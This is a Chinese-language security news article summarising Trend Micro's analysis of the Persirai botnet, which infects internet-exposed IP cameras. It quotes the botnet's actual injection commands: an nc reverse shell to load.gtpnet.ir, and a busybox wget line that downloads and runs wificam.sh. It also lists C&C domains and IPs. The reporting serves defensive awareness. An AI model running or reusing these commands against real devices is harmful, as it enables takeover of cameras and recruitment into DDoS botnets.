首页 > 安全 > 网络安全 > 正文
以网络摄像头为感染目标的新型IoT僵尸网络Persirai
2017-05-19       个评论      
收藏    我要投稿

以网络摄像头为感染目标的新型IoT僵尸网络Persirai。趋势科技(Trend Micro)最近发现了一种新型物联网(IoT)僵尸网络,该僵尸网络利用恶意软件 ELF_PERSIRAI.A进行不断传播感染。据分析,目前已有多家原始设备制造商(OEM)的1000多种型号网络摄像头产品受此恶意网络感染,但趋势科技并未透露详细受影响制造商,下一步可能会和相关制造商配合进行感染识别和漏洞修复。这可能是继Mirai和Hajime之后又一波针对IoT设备的新型攻击力量,趋势科技把其命名为Persirai。

\

趋势科技通过Shodan发现,大约有120,000台网络摄像设备面临感染Persirai的风险,这些设备赤裸裸地暴露在网,极易被攻击者通过其设备80端口入侵Web管理页面,形成感染控制,然而,其设备使用者却对此毫无意识。以下是4月26日的Persirai感染趋势图,从图中可以看出,中国是该类僵尸网络感染的重灾区,仅大陆地区的感染率就高达20.3%。

\

行为分析

通常,在用户内部网络中,网络摄像头通常可以使用路由器的即插即用(UPnP)协议功能进行端口映射,使得用户可以通过广域网远程访问到设备,而这也带来了感染IoT恶意软件的风险。Persirai正是利用恶意软件ELF_PERSIRAI.A,对暴露在网的网络摄像头进行传播感染:

\

目前,这种攻击的大部分受影响设备由于未更改默认出厂密码或存在弱口令,攻击者通过密码组合进行大规模的自动化入侵登录,进入网络摄像头的Web管理接口后,通过以下注入命令强制摄像设备连接到一个下载网站执行恶意文件下载:

$(nc load.gtpnet.ir 1234 -e /bin/sh)

之后,远端下载网站将会给出以下命令响应,通知被控制的网络摄像头从域名连接ntp.gtpnet.ir处下载恶意shell脚本文件:

busybox nohup sh -c “killall encoder ;wget http://ntp.gtpnet.ir/wificam.sh -O /tmp/a.sh ;chmod +x /tmp/a.sh ;/tmp/a.sh” > /dev/null 2>&1 &

其中, wificam.sh脚本将会下载并执行以下恶意样本文件,并在所有恶意程序完全执行之后,进行自毁删除。

\

所有恶意样本程序将会在被控网络摄像设备的内存中运行,同时,将会在被控设备系统的/dev/null目录下生成ftpupdate.sh和ftpupload.sh,以阻止0day漏洞和其它形式对被控设备的攻击。然而,如果被控设备一旦执行重新启动操作,也不能消除此类隐患,恶意软件也将迅速对该设备形成攻击。

C&C控制

网络摄像头一旦被感染控制后,将会与以下C&C服务器执行通信响应:

load.gtpnet.ir

ntp.gtpnet.ir

185.62.189.232

95.85.38.103

接收到C&C服务器的响应信息之后,被控摄像头将会利用前不久公开的一个0day漏洞利用模块,自动对其它网络摄像头发起攻击。不论目标网络摄像设备的密码有多复杂,攻击者都能利用该漏洞获取设备的用户密码文件,进而进行命令注入。以下是该漏洞的一个攻击payload:

\

当然,被控摄像头还能从C&C服务器处接收对其它网络系统的DDoS攻击指令。值得注意的是,Persirai可以利用SSDP包(简单服务发现协议包),不需要执行IP地址欺骗,就能发起UDP方式的DDoS攻击。以下为其DDoS攻击中使用的特殊“后门”协议:

\

箭头所指部分标明了被控设备与C&C服务器的通信方式,其中包含了攻击命令和攻击目标的IP地址和端口号。

点击复制链接 与好友分享!回本站首页
上一篇:维基解密公布CIA使用的Windows恶意软件框架“午夜之后”和“刺客”
下一篇:谷歌工程师:微软家的 Defender 表现得最像一款杀毒软件
相关文章
图文推荐
文章
推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训
版权所有: 红黑联盟--致力于做实用的IT技术学习网站